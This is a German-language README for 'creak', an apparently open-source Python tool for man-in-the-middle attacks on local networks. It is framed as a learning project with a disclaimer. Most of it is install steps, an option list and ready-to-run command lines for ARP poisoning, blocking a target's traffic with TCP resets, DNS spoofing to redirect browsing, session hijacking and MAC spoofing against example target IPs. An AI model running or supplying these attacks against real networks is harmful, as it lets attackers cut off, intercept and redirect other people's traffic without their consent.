
Vergiften, Zurücksetzen, Spoofen, Umleiten – MITM-Skript
Führt einige der bekanntesten MITM-Angriffe auf Zieladressen in einem lokalen Netzwerk durch. Darunter die Blockierung der Navigations- und Download-Fähigkeiten eines Zielrechners im lokalen Netzwerk durch einen ARP-Vergiftungsangriff und das Senden von TCP-Reset-Paketen an jede Anfrage, die an den Router gestellt wird. Als didaktisches Projekt zum Erlernen der Python-Sprache entstanden, lehne ich jede Verantwortung für Missbrauch, einschließlich böswilliger oder illegaler Nutzung dieses Codes, ab.
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
oder klonen Sie einfach das Repository und führen Sie die creak.py aus, nachdem alle Abhängigkeiten installiert sind:
$ git clone https://github.com/codepr/creak.git
Es ist erforderlich, die pcap-Bibliotheken für rohe Paketmanipulationen und das dpkt-Modul installiert zu haben. Für DNS-Spoofing-Optionen muss das dnet-Modul aus dem libdnet-Paket installiert sein, verwechseln Sie es nicht mit dem pydnet-Modul (Netzwerk-Bewertungswerkzeug). Es kann auch scapy verwendet werden, falls gewünscht, kann einfach in der config-Datei im Abschnitt [output] > ENGINE eingestellt werden.
Usage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
Einfachste Verwendung: Den gesamten Verkehr zum Zielhost blockieren
$ python creak.py -t 192.168.1.30 wlan0
Ein anderes Gateway setzen:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Eine andere MAC-Adresse für das Gerät setzen:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
MAC-Adresse durch Generieren einer gefälschten Adresse spoofen:
$ python creak.py -x -t 192.168.1.30 wlan0
MAC-Adresse durch Generieren einer auf dem Hersteller basierenden Adresse (z.B. Xeros) spoofen:
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
DNS-Spoofing mit gefälschter MAC-Adresse, Umleitung von ab.xy nach cd.xz (z.B. localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Mehrere Hosts im Subnetz blockieren:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
Siehe die Datei CHANGELOG.
Scapy-Unterstützung (begonnen)Siehe die Datei LICENSE für Lizenzrechte und -beschränkungen (GNU v3).